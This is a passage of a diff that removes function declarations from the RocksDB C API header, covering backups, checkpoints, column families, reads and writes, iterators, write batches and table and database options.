-extern ROCKSDB_LIBRARY_API int64_t
-rocksdb_backup_engine_info_timestamp(const rocksdb_backup_engine_info_t* info,
-                                     int index);
-
-extern ROCKSDB_LIBRARY_API uint32_t
-rocksdb_backup_engine_info_backup_id(const rocksdb_backup_engine_info_t* info,
-                                     int index);
-
-extern ROCKSDB_LIBRARY_API uint64_t
-rocksdb_backup_engine_info_size(const rocksdb_backup_engine_info_t* info,
-                                int index);
-
-extern ROCKSDB_LIBRARY_API uint32_t rocksdb_backup_engine_info_number_files(
-    const rocksdb_backup_engine_info_t* info, int index);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_backup_engine_info_destroy(
-    const rocksdb_backup_engine_info_t* info);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_backup_engine_close(
-    rocksdb_backup_engine_t* be);
-
-extern ROCKSDB_LIBRARY_API rocksdb_checkpoint_t*
-rocksdb_checkpoint_object_create(rocksdb_t* db, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_checkpoint_create(
-    rocksdb_checkpoint_t* checkpoint, const char* checkpoint_dir,
-    uint64_t log_size_for_flush, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_checkpoint_object_destroy(
-    rocksdb_checkpoint_t* checkpoint);
-
-extern ROCKSDB_LIBRARY_API rocksdb_t* rocksdb_open_column_families(
-    const rocksdb_options_t* options, const char* name, int num_column_families,
-    const char** column_family_names,
-    const rocksdb_options_t** column_family_options,
-    rocksdb_column_family_handle_t** column_family_handles, char** errptr);
-
-extern ROCKSDB_LIBRARY_API rocksdb_t*
-rocksdb_open_for_read_only_column_families(
-    const rocksdb_options_t* options, const char* name, int num_column_families,
-    const char** column_family_names,
-    const rocksdb_options_t** column_family_options,
-    rocksdb_column_family_handle_t** column_family_handles,
-    unsigned char error_if_log_file_exist, char** errptr);
-
-extern ROCKSDB_LIBRARY_API char** rocksdb_list_column_families(
-    const rocksdb_options_t* options, const char* name, size_t* lencf,
-    char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_list_column_families_destroy(
-    char** list, size_t len);
-
-extern ROCKSDB_LIBRARY_API rocksdb_column_family_handle_t*
-rocksdb_create_column_family(rocksdb_t* db,
-                             const rocksdb_options_t* column_family_options,
-                             const char* column_family_name, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_drop_column_family(
-    rocksdb_t* db, rocksdb_column_family_handle_t* handle, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_column_family_handle_destroy(
-    rocksdb_column_family_handle_t*);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_close(rocksdb_t* db);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_put(
-    rocksdb_t* db, const rocksdb_writeoptions_t* options, const char* key,
-    size_t keylen, const char* val, size_t vallen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_put_cf(
-    rocksdb_t* db, const rocksdb_writeoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key,
-    size_t keylen, const char* val, size_t vallen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_delete(
-    rocksdb_t* db, const rocksdb_writeoptions_t* options, const char* key,
-    size_t keylen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_delete_cf(
-    rocksdb_t* db, const rocksdb_writeoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key,
-    size_t keylen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_merge(
-    rocksdb_t* db, const rocksdb_writeoptions_t* options, const char* key,
-    size_t keylen, const char* val, size_t vallen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_merge_cf(
-    rocksdb_t* db, const rocksdb_writeoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key,
-    size_t keylen, const char* val, size_t vallen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_write(
-    rocksdb_t* db, const rocksdb_writeoptions_t* options,
-    rocksdb_writebatch_t* batch, char** errptr);
-
-/* Returns NULL if not found.  A malloc()ed array otherwise.
-   Stores the length of the array in *vallen. */
-extern ROCKSDB_LIBRARY_API char* rocksdb_get(
-    rocksdb_t* db, const rocksdb_readoptions_t* options, const char* key,
-    size_t keylen, size_t* vallen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API char* rocksdb_get_cf(
-    rocksdb_t* db, const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key,
-    size_t keylen, size_t* vallen, char** errptr);
-
-// if values_list[i] == NULL and errs[i] == NULL,
-// then we got status.IsNotFound(), which we will not return.
-// all errors except status status.ok() and status.IsNotFound() are returned.
-//
-// errs, values_list and values_list_sizes must be num_keys in length,
-// allocated by the caller.
-// errs is a list of strings as opposed to the conventional one error,
-// where errs[i] is the status for retrieval of keys_list[i].
-// each non-NULL errs entry is a malloc()ed, null terminated string.
-// each non-NULL values_list entry is a malloc()ed array, with
-// the length for each stored in values_list_sizes[i].
-extern ROCKSDB_LIBRARY_API void rocksdb_multi_get(
-    rocksdb_t* db, const rocksdb_readoptions_t* options, size_t num_keys,
-    const char* const* keys_list, const size_t* keys_list_sizes,
-    char** values_list, size_t* values_list_sizes, char** errs);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_multi_get_cf(
-    rocksdb_t* db, const rocksdb_readoptions_t* options,
-    const rocksdb_column_family_handle_t* const* column_families,
-    size_t num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes, char** values_list,
-    size_t* values_list_sizes, char** errs);
-
-extern ROCKSDB_LIBRARY_API rocksdb_iterator_t* rocksdb_create_iterator(
-    rocksdb_t* db, const rocksdb_readoptions_t* options);
-
-extern ROCKSDB_LIBRARY_API rocksdb_iterator_t* rocksdb_create_iterator_cf(
-    rocksdb_t* db, const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* column_family);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_create_iterators(
-    rocksdb_t *db, rocksdb_readoptions_t* opts,
-    rocksdb_column_family_handle_t** column_families,
-    rocksdb_iterator_t** iterators, size_t size, char** errptr);
-
-extern ROCKSDB_LIBRARY_API const rocksdb_snapshot_t* rocksdb_create_snapshot(
-    rocksdb_t* db);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_release_snapshot(
-    rocksdb_t* db, const rocksdb_snapshot_t* snapshot);
-
-/* Returns NULL if property name is unknown.
-   Else returns a pointer to a malloc()-ed null-terminated value. */
-extern ROCKSDB_LIBRARY_API char* rocksdb_property_value(rocksdb_t* db,
-                                                        const char* propname);
-/* returns 0 on success, -1 otherwise */
-int rocksdb_property_int(
-    rocksdb_t* db,
-    const char* propname, uint64_t *out_val);
-
-extern ROCKSDB_LIBRARY_API char* rocksdb_property_value_cf(
-    rocksdb_t* db, rocksdb_column_family_handle_t* column_family,
-    const char* propname);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_approximate_sizes(
-    rocksdb_t* db, int num_ranges, const char* const* range_start_key,
-    const size_t* range_start_key_len, const char* const* range_limit_key,
-    const size_t* range_limit_key_len, uint64_t* sizes);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_approximate_sizes_cf(
-    rocksdb_t* db, rocksdb_column_family_handle_t* column_family,
-    int num_ranges, const char* const* range_start_key,
-    const size_t* range_start_key_len, const char* const* range_limit_key,
-    const size_t* range_limit_key_len, uint64_t* sizes);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_compact_range(rocksdb_t* db,
-                                                      const char* start_key,
-                                                      size_t start_key_len,
-                                                      const char* limit_key,
-                                                      size_t limit_key_len);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_compact_range_cf(
-    rocksdb_t* db, rocksdb_column_family_handle_t* column_family,
-    const char* start_key, size_t start_key_len, const char* limit_key,
-    size_t limit_key_len);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_compact_range_opt(
-    rocksdb_t* db, rocksdb_compactoptions_t* opt, const char* start_key,
-    size_t start_key_len, const char* limit_key, size_t limit_key_len);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_compact_range_cf_opt(
-    rocksdb_t* db, rocksdb_column_family_handle_t* column_family,
-    rocksdb_compactoptions_t* opt, const char* start_key, size_t start_key_len,
-    const char* limit_key, size_t limit_key_len);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_delete_file(rocksdb_t* db,
-                                                    const char* name);
-
-extern ROCKSDB_LIBRARY_API const rocksdb_livefiles_t* rocksdb_livefiles(
-    rocksdb_t* db);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_flush(
-    rocksdb_t* db, const rocksdb_flushoptions_t* options, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_disable_file_deletions(rocksdb_t* db,
-                                                               char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_enable_file_deletions(
-    rocksdb_t* db, unsigned char force, char** errptr);
-
-/* Management operations */
-
-extern ROCKSDB_LIBRARY_API void rocksdb_destroy_db(
-    const rocksdb_options_t* options, const char* name, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_repair_db(
-    const rocksdb_options_t* options, const char* name, char** errptr);
-
-/* Iterator */
-
-extern ROCKSDB_LIBRARY_API void rocksdb_iter_destroy(rocksdb_iterator_t*);
-extern ROCKSDB_LIBRARY_API unsigned char rocksdb_iter_valid(
-    const rocksdb_iterator_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_iter_seek_to_first(rocksdb_iterator_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_iter_seek_to_last(rocksdb_iterator_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_iter_seek(rocksdb_iterator_t*,
-                                                  const char* k, size_t klen);
-extern ROCKSDB_LIBRARY_API void rocksdb_iter_seek_for_prev(rocksdb_iterator_t*,
-                                                           const char* k,
-                                                           size_t klen);
-extern ROCKSDB_LIBRARY_API void rocksdb_iter_next(rocksdb_iterator_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_iter_prev(rocksdb_iterator_t*);
-extern ROCKSDB_LIBRARY_API const char* rocksdb_iter_key(
-    const rocksdb_iterator_t*, size_t* klen);
-extern ROCKSDB_LIBRARY_API const char* rocksdb_iter_value(
-    const rocksdb_iterator_t*, size_t* vlen);
-extern ROCKSDB_LIBRARY_API void rocksdb_iter_get_error(
-    const rocksdb_iterator_t*, char** errptr);
-
-/* Write batch */
-
-extern ROCKSDB_LIBRARY_API rocksdb_writebatch_t* rocksdb_writebatch_create();
-extern ROCKSDB_LIBRARY_API rocksdb_writebatch_t* rocksdb_writebatch_create_from(
-    const char* rep, size_t size);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_destroy(
-    rocksdb_writebatch_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_clear(rocksdb_writebatch_t*);
-extern ROCKSDB_LIBRARY_API int rocksdb_writebatch_count(rocksdb_writebatch_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_put(rocksdb_writebatch_t*,
-                                                       const char* key,
-                                                       size_t klen,
-                                                       const char* val,
-                                                       size_t vlen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_put_cf(
-    rocksdb_writebatch_t*, rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen, const char* val, size_t vlen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_putv(
-    rocksdb_writebatch_t* b, int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes, int num_values,
-    const char* const* values_list, const size_t* values_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_putv_cf(
-    rocksdb_writebatch_t* b, rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list, const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_merge(rocksdb_writebatch_t*,
-                                                         const char* key,
-                                                         size_t klen,
-                                                         const char* val,
-                                                         size_t vlen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_merge_cf(
-    rocksdb_writebatch_t*, rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen, const char* val, size_t vlen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_mergev(
-    rocksdb_writebatch_t* b, int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes, int num_values,
-    const char* const* values_list, const size_t* values_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_mergev_cf(
-    rocksdb_writebatch_t* b, rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list, const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_delete(rocksdb_writebatch_t*,
-                                                          const char* key,
-                                                          size_t klen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_delete_cf(
-    rocksdb_writebatch_t*, rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_deletev(
-    rocksdb_writebatch_t* b, int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_deletev_cf(
-    rocksdb_writebatch_t* b, rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list, const size_t* keys_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_delete_range(
-    rocksdb_writebatch_t* b, const char* start_key, size_t start_key_len,
-    const char* end_key, size_t end_key_len);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_delete_range_cf(
-    rocksdb_writebatch_t* b, rocksdb_column_family_handle_t* column_family,
-    const char* start_key, size_t start_key_len, const char* end_key,
-    size_t end_key_len);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_delete_rangev(
-    rocksdb_writebatch_t* b, int num_keys, const char* const* start_keys_list,
-    const size_t* start_keys_list_sizes, const char* const* end_keys_list,
-    const size_t* end_keys_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_delete_rangev_cf(
-    rocksdb_writebatch_t* b, rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* start_keys_list,
-    const size_t* start_keys_list_sizes, const char* const* end_keys_list,
-    const size_t* end_keys_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_put_log_data(
-    rocksdb_writebatch_t*, const char* blob, size_t len);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_iterate(
-    rocksdb_writebatch_t*, void* state,
-    void (*put)(void*, const char* k, size_t klen, const char* v, size_t vlen),
-    void (*deleted)(void*, const char* k, size_t klen));
-extern ROCKSDB_LIBRARY_API const char* rocksdb_writebatch_data(
-    rocksdb_writebatch_t*, size_t* size);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_set_save_point(
-    rocksdb_writebatch_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_rollback_to_save_point(
-    rocksdb_writebatch_t*, char** errptr);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_pop_save_point(
-    rocksdb_writebatch_t*, char** errptr);
-
-/* Write batch with index */
-
-extern ROCKSDB_LIBRARY_API rocksdb_writebatch_wi_t* rocksdb_writebatch_wi_create(
-                                                       size_t reserved_bytes,
-                                                       unsigned char overwrite_keys);
-extern ROCKSDB_LIBRARY_API rocksdb_writebatch_wi_t* rocksdb_writebatch_wi_create_from(
-    const char* rep, size_t size);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_destroy(
-    rocksdb_writebatch_wi_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_clear(rocksdb_writebatch_wi_t*);
-extern ROCKSDB_LIBRARY_API int rocksdb_writebatch_wi_count(rocksdb_writebatch_wi_t* b);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_put(rocksdb_writebatch_wi_t*,
-                                                       const char* key,
-                                                       size_t klen,
-                                                       const char* val,
-                                                       size_t vlen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_put_cf(
-    rocksdb_writebatch_wi_t*, rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen, const char* val, size_t vlen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_putv(
-    rocksdb_writebatch_wi_t* b, int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes, int num_values,
-    const char* const* values_list, const size_t* values_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_putv_cf(
-    rocksdb_writebatch_wi_t* b, rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list, const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_merge(rocksdb_writebatch_wi_t*,
-                                                         const char* key,
-                                                         size_t klen,
-                                                         const char* val,
-                                                         size_t vlen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_merge_cf(
-    rocksdb_writebatch_wi_t*, rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen, const char* val, size_t vlen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_mergev(
-    rocksdb_writebatch_wi_t* b, int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes, int num_values,
-    const char* const* values_list, const size_t* values_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_mergev_cf(
-    rocksdb_writebatch_wi_t* b, rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list, const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_delete(rocksdb_writebatch_wi_t*,
-                                                          const char* key,
-                                                          size_t klen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_delete_cf(
-    rocksdb_writebatch_wi_t*, rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_deletev(
-    rocksdb_writebatch_wi_t* b, int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_deletev_cf(
-    rocksdb_writebatch_wi_t* b, rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list, const size_t* keys_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_delete_range(
-    rocksdb_writebatch_wi_t* b, const char* start_key, size_t start_key_len,
-    const char* end_key, size_t end_key_len);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_delete_range_cf(
-    rocksdb_writebatch_wi_t* b, rocksdb_column_family_handle_t* column_family,
-    const char* start_key, size_t start_key_len, const char* end_key,
-    size_t end_key_len);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_delete_rangev(
-    rocksdb_writebatch_wi_t* b, int num_keys, const char* const* start_keys_list,
-    const size_t* start_keys_list_sizes, const char* const* end_keys_list,
-    const size_t* end_keys_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_delete_rangev_cf(
-    rocksdb_writebatch_wi_t* b, rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* start_keys_list,
-    const size_t* start_keys_list_sizes, const char* const* end_keys_list,
-    const size_t* end_keys_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_put_log_data(
-    rocksdb_writebatch_wi_t*, const char* blob, size_t len);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_iterate(
-    rocksdb_writebatch_wi_t* b,
-    void* state,
-    void (*put)(void*, const char* k, size_t klen, const char* v, size_t vlen),
-    void (*deleted)(void*, const char* k, size_t klen));
-extern ROCKSDB_LIBRARY_API const char* rocksdb_writebatch_wi_data(
-    rocksdb_writebatch_wi_t* b,
-    size_t* size);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_set_save_point(
-    rocksdb_writebatch_wi_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_rollback_to_save_point(
-    rocksdb_writebatch_wi_t*, char** errptr);
-extern ROCKSDB_LIBRARY_API char* rocksdb_writebatch_wi_get_from_batch(
-    rocksdb_writebatch_wi_t* wbwi,
-    const rocksdb_options_t* options,
-    const char* key, size_t keylen,
-    size_t* vallen,
-    char** errptr);
-extern ROCKSDB_LIBRARY_API char* rocksdb_writebatch_wi_get_from_batch_cf(
-    rocksdb_writebatch_wi_t* wbwi,
-    const rocksdb_options_t* options,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t keylen,
-    size_t* vallen,
-    char** errptr);
-extern ROCKSDB_LIBRARY_API char* rocksdb_writebatch_wi_get_from_batch_and_db(
-    rocksdb_writebatch_wi_t* wbwi,
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options,
-    const char* key, size_t keylen,
-    size_t* vallen,
-    char** errptr);
-extern ROCKSDB_LIBRARY_API char* rocksdb_writebatch_wi_get_from_batch_and_db_cf(
-    rocksdb_writebatch_wi_t* wbwi,
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t keylen,
-    size_t* vallen,
-    char** errptr);
-extern ROCKSDB_LIBRARY_API void rocksdb_write_writebatch_wi(
-    rocksdb_t* db,
-    const rocksdb_writeoptions_t* options,
-    rocksdb_writebatch_wi_t* wbwi,
-    char** errptr);
-extern ROCKSDB_LIBRARY_API rocksdb_iterator_t* rocksdb_writebatch_wi_create_iterator_with_base(
-    rocksdb_writebatch_wi_t* wbwi,
-    rocksdb_iterator_t* base_iterator);
-extern ROCKSDB_LIBRARY_API rocksdb_iterator_t* rocksdb_writebatch_wi_create_iterator_with_base_cf(
-    rocksdb_writebatch_wi_t* wbwi,
-    rocksdb_iterator_t* base_iterator,
-    rocksdb_column_family_handle_t* cf);
-
-
-/* Block based table options */
-
-extern ROCKSDB_LIBRARY_API rocksdb_block_based_table_options_t*
-rocksdb_block_based_options_create();
-extern ROCKSDB_LIBRARY_API void rocksdb_block_based_options_destroy(
-    rocksdb_block_based_table_options_t* options);
-extern ROCKSDB_LIBRARY_API void rocksdb_block_based_options_set_block_size(
-    rocksdb_block_based_table_options_t* options, size_t block_size);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_block_based_options_set_block_size_deviation(
-    rocksdb_block_based_table_options_t* options, int block_size_deviation);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_block_based_options_set_block_restart_interval(
-    rocksdb_block_based_table_options_t* options, int block_restart_interval);
-extern ROCKSDB_LIBRARY_API void rocksdb_block_based_options_set_filter_policy(
-    rocksdb_block_based_table_options_t* options,
-    rocksdb_filterpolicy_t* filter_policy);
-extern ROCKSDB_LIBRARY_API void rocksdb_block_based_options_set_no_block_cache(
-    rocksdb_block_based_table_options_t* options, unsigned char no_block_cache);
-extern ROCKSDB_LIBRARY_API void rocksdb_block_based_options_set_block_cache(
-    rocksdb_block_based_table_options_t* options, rocksdb_cache_t* block_cache);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_block_based_options_set_block_cache_compressed(
-    rocksdb_block_based_table_options_t* options,
-    rocksdb_cache_t* block_cache_compressed);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_block_based_options_set_whole_key_filtering(
-    rocksdb_block_based_table_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_block_based_options_set_format_version(
-    rocksdb_block_based_table_options_t*, int);
-enum {
-  rocksdb_block_based_table_index_type_binary_search = 0,
-  rocksdb_block_based_table_index_type_hash_search = 1,
-  rocksdb_block_based_table_index_type_two_level_index_search = 2,
-};
-extern ROCKSDB_LIBRARY_API void rocksdb_block_based_options_set_index_type(
-    rocksdb_block_based_table_options_t*, int);  // uses one of the above enums
-extern ROCKSDB_LIBRARY_API void
-rocksdb_block_based_options_set_hash_index_allow_collision(
-    rocksdb_block_based_table_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_block_based_options_set_cache_index_and_filter_blocks(
-    rocksdb_block_based_table_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_block_based_options_set_pin_l0_filter_and_index_blocks_in_cache(
-    rocksdb_block_based_table_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_block_based_table_factory(
-    rocksdb_options_t* opt, rocksdb_block_based_table_options_t* table_options);
-
-/* Cuckoo table options */
-
-extern ROCKSDB_LIBRARY_API rocksdb_cuckoo_table_options_t*
-rocksdb_cuckoo_options_create();
-extern ROCKSDB_LIBRARY_API void rocksdb_cuckoo_options_destroy(
-    rocksdb_cuckoo_table_options_t* options);
-extern ROCKSDB_LIBRARY_API void rocksdb_cuckoo_options_set_hash_ratio(
-    rocksdb_cuckoo_table_options_t* options, double v);
-extern ROCKSDB_LIBRARY_API void rocksdb_cuckoo_options_set_max_search_depth(
-    rocksdb_cuckoo_table_options_t* options, uint32_t v);
-extern ROCKSDB_LIBRARY_API void rocksdb_cuckoo_options_set_cuckoo_block_size(
-    rocksdb_cuckoo_table_options_t* options, uint32_t v);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_cuckoo_options_set_identity_as_first_hash(
-    rocksdb_cuckoo_table_options_t* options, unsigned char v);
-extern ROCKSDB_LIBRARY_API void rocksdb_cuckoo_options_set_use_module_hash(
-    rocksdb_cuckoo_table_options_t* options, unsigned char v);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_cuckoo_table_factory(
-    rocksdb_options_t* opt, rocksdb_cuckoo_table_options_t* table_options);
-
-/* Options */
-extern ROCKSDB_LIBRARY_API void rocksdb_set_options(
-    rocksdb_t* db, int count, const char* const keys[], const char* const values[], char** errptr);
-
-extern ROCKSDB_LIBRARY_API rocksdb_options_t* rocksdb_options_create();
-extern ROCKSDB_LIBRARY_API void rocksdb_options_destroy(rocksdb_options_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_increase_parallelism(
-    rocksdb_options_t* opt, int total_threads);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_optimize_for_point_lookup(
-    rocksdb_options_t* opt, uint64_t block_cache_size_mb);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_optimize_level_style_compaction(
-    rocksdb_options_t* opt, uint64_t memtable_memory_budget);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_optimize_universal_style_compaction(
-    rocksdb_options_t* opt, uint64_t memtable_memory_budget);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_compaction_filter(
-    rocksdb_options_t*, rocksdb_compactionfilter_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_compaction_filter_factory(
-    rocksdb_options_t*, rocksdb_compactionfilterfactory_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_compaction_readahead_size(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_comparator(
-    rocksdb_options_t*, rocksdb_comparator_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_merge_operator(
-    rocksdb_options_t*, rocksdb_mergeoperator_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_uint64add_merge_operator(
-    rocksdb_options_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_compression_per_level(
-    rocksdb_options_t* opt, int* level_values, size_t num_levels);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_create_if_missing(
-    rocksdb_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_create_missing_column_families(rocksdb_options_t*,
-                                                   unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_error_if_exists(
-    rocksdb_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_paranoid_checks(
-    rocksdb_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_db_paths(rocksdb_options_t*,
-                                                             const rocksdb_dbpath_t** path_values, 
-                                                             size_t num_paths);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_env(rocksdb_options_t*,
-                                                        rocksdb_env_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_info_log(rocksdb_options_t*,
-                                                             rocksdb_logger_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_info_log_level(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_write_buffer_size(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_db_write_buffer_size(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_open_files(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_file_opening_threads(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_total_wal_size(
-    rocksdb_options_t* opt, uint64_t n);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_compression_options(
-    rocksdb_options_t*, int, int, int, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_prefix_extractor(
-    rocksdb_options_t*, rocksdb_slicetransform_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_num_levels(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_level0_file_num_compaction_trigger(rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_level0_slowdown_writes_trigger(rocksdb_options_t*, int);
